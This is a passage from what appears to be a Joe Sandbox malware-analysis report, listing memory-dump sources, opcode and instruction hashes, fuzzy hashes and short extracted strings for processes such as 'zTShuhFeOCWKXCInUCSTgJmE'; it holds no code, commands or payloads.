                                    • Instruction ID: c18ae4262beb3b49f107e8eb12235e28951bbca85ccb3636f3f8102e0399af9f
                                    • Opcode Fuzzy Hash: b6d842f2f12ac8d3f6589e0b6a5fb59edf34f493558c945e250f11f9614156cc
                                    • Instruction Fuzzy Hash: 16F0FF30D58A1E8AFB98AB68D84A3FE7BF0FF96354F00057EE41EC20C2DE241154C201
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aea8ab07815f04d168a1616692338be5088dcad5848f31797ce283d0d7b4333a
                                    • Instruction ID: 5ddabab4ec28ba99e0784a2a406d89d87474f4bcae4def6fe4390591b7a6314e
                                    • Opcode Fuzzy Hash: aea8ab07815f04d168a1616692338be5088dcad5848f31797ce283d0d7b4333a
                                    • Instruction Fuzzy Hash: BBF0AF3094964E8FEB44EE24C4162FE3BA0FF05348F51087AE80DC20D2DB35A590CA81
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 523bae42cd7c4ec6962e28834e8db9bd02e549fd91d9344fc67826741f3d294c
                                    • Instruction ID: 41fc9501a678d1c10c791d32b60f0ef5ce7f47d1a2c29f76fad01d99c5bd5194
                                    • Opcode Fuzzy Hash: 523bae42cd7c4ec6962e28834e8db9bd02e549fd91d9344fc67826741f3d294c
                                    • Instruction Fuzzy Hash: 6EF0493184E78A8FEB5A9B2488562ED3FB0FF56205F4508BAD419C61D3DA2D9898C742
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 377881dc25fe95cd8bc941f6307ae1947f19d08971ae0a7dde1d4bed0e63c2f7
                                    • Instruction ID: c90760617b0459b90e0a804d65c5cd195901c51b0b20bb3b8d89218bcc084911
                                    • Opcode Fuzzy Hash: 377881dc25fe95cd8bc941f6307ae1947f19d08971ae0a7dde1d4bed0e63c2f7
                                    • Instruction Fuzzy Hash: 3DF09A3188968ACBEB599F64885A2FD3BB0FF15306F4404BEE819C61D2DB3D9494C701
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ff887ad0000_SurrogateContainerAgent.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction ID: 43317c8a4dae5852556943a01e46c870851d0f69c1b1554d646452b3b3653141
                                    • Opcode Fuzzy Hash: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction Fuzzy Hash: 84E02270D1592D8FDBA4DA048845BEABAB1BF49342F1005E9844DE6281DA745E80CF44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$M_H
                                    • API String ID: 0-1129421110
                                    • Opcode ID: 67f79dfeb3edf78d29b8c6ca377dc653111173108b44a9dc09e0e9b60194cdb3
                                    • Instruction ID: 5ae8b38671c9a1979386809a64ff7c7e29f8c65edd777f582013e3a914aa9ff4
                                    • Opcode Fuzzy Hash: 67f79dfeb3edf78d29b8c6ca377dc653111173108b44a9dc09e0e9b60194cdb3
                                    • Instruction Fuzzy Hash: 94619C7291894A8FEB94EB68C8567FD7BF1FF5A380F4001B9C00DC7296DA686841CB41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Wp
                                    • API String ID: 0-545783698
                                    • Opcode ID: f6f82237ef7657f642f8cfd399c0237fb006c51c633cb22e82bfa13883c1e32e
                                    • Instruction ID: f5c984106959948d243b58974f42845fea04c8d6283c06985c8a266b8f9e83fb
                                    • Opcode Fuzzy Hash: f6f82237ef7657f642f8cfd399c0237fb006c51c633cb22e82bfa13883c1e32e
                                    • Instruction Fuzzy Hash: 1C412932A4DA8A4FE795D77888562BD7BF1FF46350B0505BBD44CC71D2DD28A881C342
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: f7e1aeba5e42c2a21aeeee17f7eb1765640a25be8d2bc636abf9b9167cae94ad
                                    • Instruction ID: a16758c617edaea5ce3e509138e89680fc7c81f9668436938cdee394f613a80a
                                    • Opcode Fuzzy Hash: f7e1aeba5e42c2a21aeeee17f7eb1765640a25be8d2bc636abf9b9167cae94ad
                                    • Instruction Fuzzy Hash: 64318C72A1990E8FE748DF68E8153ED7BF1EB96391F5002BAC00DD72C6CBB914558B41
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e0ef7c0185c1780fbe1914ad929b24fd8a018a992154f51986147f8b84d86a4
                                    • Instruction ID: 473b8774ed2bf98ff0115f2c3332b6871dd780b931c68ae91b0726fbc1301d08
                                    • Opcode Fuzzy Hash: 0e0ef7c0185c1780fbe1914ad929b24fd8a018a992154f51986147f8b84d86a4
                                    • Instruction Fuzzy Hash: 85719032E58A598FDB89DE1CD8626BD77E2FF98744B14417AD45EC3282DE34A802C781
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 534118afd4fe6c783c2eccabdc3e658208ab1f7129d736fa52a6e071a2d95928
                                    • Instruction ID: b31f66160b5ab28b829c424c470890aab18da227c8bee21bedac12c155b4346f
                                    • Opcode Fuzzy Hash: 534118afd4fe6c783c2eccabdc3e658208ab1f7129d736fa52a6e071a2d95928
                                    • Instruction Fuzzy Hash: FF51B132A58A598FDB88DE1CC8556BE77E2FF98750B14467ED44EC3285CE34E802CB81
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb3a9409c14906b91d1b7f4e9413192ac390ade2846efd80d21c1a1dedfc3998
                                    • Instruction ID: 726f86f715d03cdab1135ea11b731d3c1bf1909600f8308994e67ba4ab30b0dc
                                    • Opcode Fuzzy Hash: bb3a9409c14906b91d1b7f4e9413192ac390ade2846efd80d21c1a1dedfc3998
                                    • Instruction Fuzzy Hash: B2512776D4861E8FEB58EBA4C456AEDBBB1FF58350F50407AD00DE7292DA386984CB00
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 973d36db744a68af0ca735415960c19f60ecf92239ced5e0e644c4c93d06d598
                                    • Instruction ID: 0a115f1f6cd7b5cea6a7eff23b20cf9850fea2aa4252a3a3f74b541be7f72dd3
                                    • Opcode Fuzzy Hash: 973d36db744a68af0ca735415960c19f60ecf92239ced5e0e644c4c93d06d598
                                    • Instruction Fuzzy Hash: 6621CD7598894E8FEB55EB28C45A2BE3BF0FF58300F0008BAD01DCB291EB38A544C711
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f88989f20f3bddf4e7e4a9cd6c71faa9537792b3c6b94977643f2188b13ac88
                                    • Instruction ID: 51f19eb4d065d9f8fd52e1614fdb4ed3752cfb293265992dd57c886c36d2135f
                                    • Opcode Fuzzy Hash: 0f88989f20f3bddf4e7e4a9cd6c71faa9537792b3c6b94977643f2188b13ac88
                                    • Instruction Fuzzy Hash: 2F119072D4850E9FE780EB68848A2FE7BF0FF58390F544576C428C7092EE38A444C751
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cc9eee5b8cb02c7a353ec1add1ba0f118d0effee99a3db42e4694efdbd666456
                                    • Instruction ID: 576ce4c191c4a9190036193fe76c5fa9c95fac6ad4fe0e721dc75f86d27929dd
                                    • Opcode Fuzzy Hash: cc9eee5b8cb02c7a353ec1add1ba0f118d0effee99a3db42e4694efdbd666456
                                    • Instruction Fuzzy Hash: 3511E272D4865A8FEB99AB68C45A3FD7BF0FF65350F0404BEC00AC60D2DA395444C701
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf1535f5aee063b23da4d0ae971581a0959fec7910013df6422fcca129f03c6d
                                    • Instruction ID: c3e1406df8d7c1d7f573f2e35f54a880353181468682914b773937896c2220e2
                                    • Opcode Fuzzy Hash: bf1535f5aee063b23da4d0ae971581a0959fec7910013df6422fcca129f03c6d
                                    • Instruction Fuzzy Hash: 39114232E4890E8FEB54EB54C895BEF77B2FB54340F204675C01AD7295CE78A985CB80
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc16866b8ac916249fa9dbe058f8331b17d7a00d151e93757a1adc6af58265ee
                                    • Instruction ID: 20501ce91581f4ad9446876a17603f092cf2baf6d50f558f11fe365023dcf528
                                    • Opcode Fuzzy Hash: dc16866b8ac916249fa9dbe058f8331b17d7a00d151e93757a1adc6af58265ee
                                    • Instruction Fuzzy Hash: 6D019A3094991E8FDB88EF24C08A6BE77B1FF58348F2008BED41EC6191CE36A590CB40
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 92d86d8855e2c48e71445a7a466f18fc5c0a1b96d1cdbe603a27e35f48d3be50
                                    • Instruction ID: 47958406a54ff7beebadfc9c898db4c862c0c3dbfe13c50bb6ba2803b38f1911
                                    • Opcode Fuzzy Hash: 92d86d8855e2c48e71445a7a466f18fc5c0a1b96d1cdbe603a27e35f48d3be50
                                    • Instruction Fuzzy Hash: 05017C32D88A4D8FE751EB64849A6FD7BF0FF19340F4555B6E418C70A2EA38E584C741
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8b625f1c0b8aa15692a3ba8acf1948bbc52a14af0087aa870e09dde02802b31e
                                    • Instruction ID: 737147f6bb7884e5fd6ee04ebf959b9a6c75ed20da2126e822a0d640737e1c37
                                    • Opcode Fuzzy Hash: 8b625f1c0b8aa15692a3ba8acf1948bbc52a14af0087aa870e09dde02802b31e
                                    • Instruction Fuzzy Hash: 17012836D4890E9EEB91EF68C8496BE7BF0FF18341F0449B6D41DC6091EA34A184CB41
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b65c5285c60348134fc4939cd53ab762e037c6b83a996431c3a172cf783f95a2
                                    • Instruction ID: e3a0d62705abb3b4d2854f27c2ac4c61d254c1f5a2d9ad4dc892dcb2345cf213
                                    • Opcode Fuzzy Hash: b65c5285c60348134fc4939cd53ab762e037c6b83a996431c3a172cf783f95a2
                                    • Instruction Fuzzy Hash: E801843298DA898FE751AB74885A1AD7BF0FF55340F0508F6D408CB0E6EE38A494C701
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ea57ec09263486b584ac9fcce3145f46f18462651162b16dadc9fadbdb6723a
                                    • Instruction ID: 001fb5854e27791b97cdcecfe121a9a4595e8c255f9b31d7fa0f58749c862ad4
                                    • Opcode Fuzzy Hash: 6ea57ec09263486b584ac9fcce3145f46f18462651162b16dadc9fadbdb6723a
                                    • Instruction Fuzzy Hash: 34018C3199890ECAEB58EB64C45A2BD73B0FF1834AF50087EE41EC61D1DF39A590CB01
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc5adf7e1ac54dc9f58599e7f52da6a08065c22e9901b210683b58198e0a008f
                                    • Instruction ID: f671f2114f654b32e94118f76193c0df5614b351bde411ecb4eb43d200984b6c
                                    • Opcode Fuzzy Hash: dc5adf7e1ac54dc9f58599e7f52da6a08065c22e9901b210683b58198e0a008f
                                    • Instruction Fuzzy Hash: 79016931958A0E8FEB59EB64C45A2BE72B1FF18346F20087EE41EC61D1DF39A594C641
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 09d86f4c905c6e681426d437988598493741232c4a2acbaec2c20fc0d422f3c1
                                    • Instruction ID: e25d6ca63c62f7b651183d25d0adfcbcaf91060f0f7ba691b400926a19729230
                                    • Opcode Fuzzy Hash: 09d86f4c905c6e681426d437988598493741232c4a2acbaec2c20fc0d422f3c1
                                    • Instruction Fuzzy Hash: 9001D17194A68D8FDB98DF24C4962FD3BB1FF15300F5404BAD40CC6192DA399990CB40
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4064481e06cd8c0e1fd19082a1cf42c07b08c0a08280484dd7568081e270591
                                    • Instruction ID: 36f3a28f1ff96894432f145a36611b7079f66922a4fe17f91027d7122c46c191
                                    • Opcode Fuzzy Hash: f4064481e06cd8c0e1fd19082a1cf42c07b08c0a08280484dd7568081e270591
                                    • Instruction Fuzzy Hash: 45F0FF72D58A2E8AFB98AA68D84A3FE77F0FF55354F00007ED41EC20C0DE281014C241
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fdffc54146626bdfbb1022121da3448554ee572ffb030ae7b2ca25da4474ad3
                                    • Instruction ID: f3e345226cd1fab6c5e2d4f1b9ebcc75046627def8943f87fc7bed2f227f4ad9
                                    • Opcode Fuzzy Hash: 2fdffc54146626bdfbb1022121da3448554ee572ffb030ae7b2ca25da4474ad3
                                    • Instruction Fuzzy Hash: E1F0CD3194A65E8FEB88EE24D4462FE37B0FF05348F10087AE80DC2081DA39A5A0CB81
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94beccc4637e030d9d8acfb34ec0cf2dfdcea2747bdab4b66645810700c99e3c
                                    • Instruction ID: 88f6a8ca15c7ee47e21769e0bbbd11bf896a32931f365d48c0a45b82cfe4f0ef
                                    • Opcode Fuzzy Hash: 94beccc4637e030d9d8acfb34ec0cf2dfdcea2747bdab4b66645810700c99e3c
                                    • Instruction Fuzzy Hash: 5AF0623284D7898FE75A9B2488552FD3BB0FF56301F4505BAD419C61D2DB3C9498C742
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a8cbc7691ee7a46cb8178e750abb2b740b7931f7895b6685f91fa5d959ae2910
                                    • Instruction ID: aa2f5623482e80e80b2cc2016c328ed5cc7394051735dcfbbd55bcf81fdda194
                                    • Opcode Fuzzy Hash: a8cbc7691ee7a46cb8178e750abb2b740b7931f7895b6685f91fa5d959ae2910
                                    • Instruction Fuzzy Hash: 39F0BE32989A8ACFEB599F64885A2FD3BB0FF15306F4405BEE809C61D2DB3C9494C701
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1581896628.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_7ff887ae0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction ID: fdcbbb154cbc505fb9acf3d74233a7b667f0735ba7232d031203bfc19dcffc64
                                    • Opcode Fuzzy Hash: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction Fuzzy Hash: 7CE02271D1592D8FDBA4EB048855BAEB7B1BF89342F5015E9C44DE6280DA745EC0CF44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6f$6f$6f$6f$6f$6f$6f$6f$6f$6f$0Dp$0Dp$0Dp$0Dp$p
                                    • API String ID: 0-224046022
                                    • Opcode ID: 290e3918a72bf63dbf407c4562120200d9b8e43585db9c9307ebecaa69adfc53
                                    • Instruction ID: a6816d01829aee7e36bea69a735135995c8171450c6c5314368b10e5b03d64f6
                                    • Opcode Fuzzy Hash: 290e3918a72bf63dbf407c4562120200d9b8e43585db9c9307ebecaa69adfc53
                                    • Instruction Fuzzy Hash: 66A2B73095891D8FDBA4EB58C895BA8B3F2FF69740F5045E9D00DE7292CA34AE81CF45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "9f$r6f$r6f$r6f$r6f$L_H
                                    • API String ID: 0-1116992257
                                    • Opcode ID: 2501d0f2665cd560da897c913bc180af30406c04cf2001624f1b78e9a1aa35fa
                                    • Instruction ID: 200e467755c1bd9133c33853bd5968cd1d6460a2aa3ee4b7723874a0d5301f7b
                                    • Opcode Fuzzy Hash: 2501d0f2665cd560da897c913bc180af30406c04cf2001624f1b78e9a1aa35fa
                                    • Instruction Fuzzy Hash: FB61CD72D1894E8FEB98DB68C8567ED7BF0FF5A380F4401B9C00DC7296DA686841CB42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AK_^$BK_^$CK_^$DK_^
                                    • API String ID: 0-615811481
                                    • Opcode ID: 34304b74704b62007a2bdcc872c18812836dc4f4de3032e3ab630bbbcd50b5e9
                                    • Instruction ID: f7f81c7c87bd802c8e6740cca1eef6667d08f7e4825fc235c7fa6e7bdf5f6cff
                                    • Opcode Fuzzy Hash: 34304b74704b62007a2bdcc872c18812836dc4f4de3032e3ab630bbbcd50b5e9
                                    • Instruction Fuzzy Hash: DC02B82290D19A6FD701FBACA8A55ED3FB0FF022A9B1801B7D48CCE193DD1C6549C256
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (0i$(0i$EY_H$r6f
                                    • API String ID: 0-901057379
                                    • Opcode ID: 9f00c03bf758985252b343e7b080e361bfc17d1ae9971cb997ca96b9f3669036
                                    • Instruction ID: 6f9ff2dce3a0d52ddbef2633a91dfb2191cebeb70723004d17d70472f0a6a759
                                    • Opcode Fuzzy Hash: 9f00c03bf758985252b343e7b080e361bfc17d1ae9971cb997ca96b9f3669036
                                    • Instruction Fuzzy Hash: 57E1E631B5CD4E4FEB99DA6C9494AB973E2FFA835070402BAD44EC7596DD28EC46C380
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f$r6f
                                    • API String ID: 0-1902842539
                                    • Opcode ID: 8805cc49e7fd8588fc1115a807dc4b6bc7bb7e4074abde9985118221a2bb737b
                                    • Instruction ID: 600864882f36c3a8839b44ba847ac625906c32ae415449dbef7b9a72030ecb4e
                                    • Opcode Fuzzy Hash: 8805cc49e7fd8588fc1115a807dc4b6bc7bb7e4074abde9985118221a2bb737b
                                    • Instruction Fuzzy Hash: C3C1B530A5CA469FE749EB28C0916B8B7B2FF59350F5441BDC04EC7A96DB28B851CB81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f$r6f
                                    • API String ID: 0-1902842539
                                    • Opcode ID: 075c33da2cfdc9df683be72256da06b2b9c36a04f065c0b8d5b4ffbc391e1339
                                    • Instruction ID: c786e3417ee70e52309e3061044956d3999d9a818d34b7da2f309a3bd992b7d0
                                    • Opcode Fuzzy Hash: 075c33da2cfdc9df683be72256da06b2b9c36a04f065c0b8d5b4ffbc391e1339
                                    • Instruction Fuzzy Hash: 7CC1B630A4CA469FE749DB68C0916A8B7F2FF59340F5441B9C44EC7A86DB38F851CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f$r6f$S<
                                    • API String ID: 0-3509035312
                                    • Opcode ID: 3c655d9bdeb8c60755428dca2d4d6e98b56c979ae833f65d840d58d02e80eb24
                                    • Instruction ID: 167087687ef63404579132bf23d5d99b7e916a8c0d1937c69911fd0bb1362593
                                    • Opcode Fuzzy Hash: 3c655d9bdeb8c60755428dca2d4d6e98b56c979ae833f65d840d58d02e80eb24
                                    • Instruction Fuzzy Hash: 8E218031E5CA4E4FE798A76858512ECB7F2FF59351F44027AE00DD3282DE586845C691
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
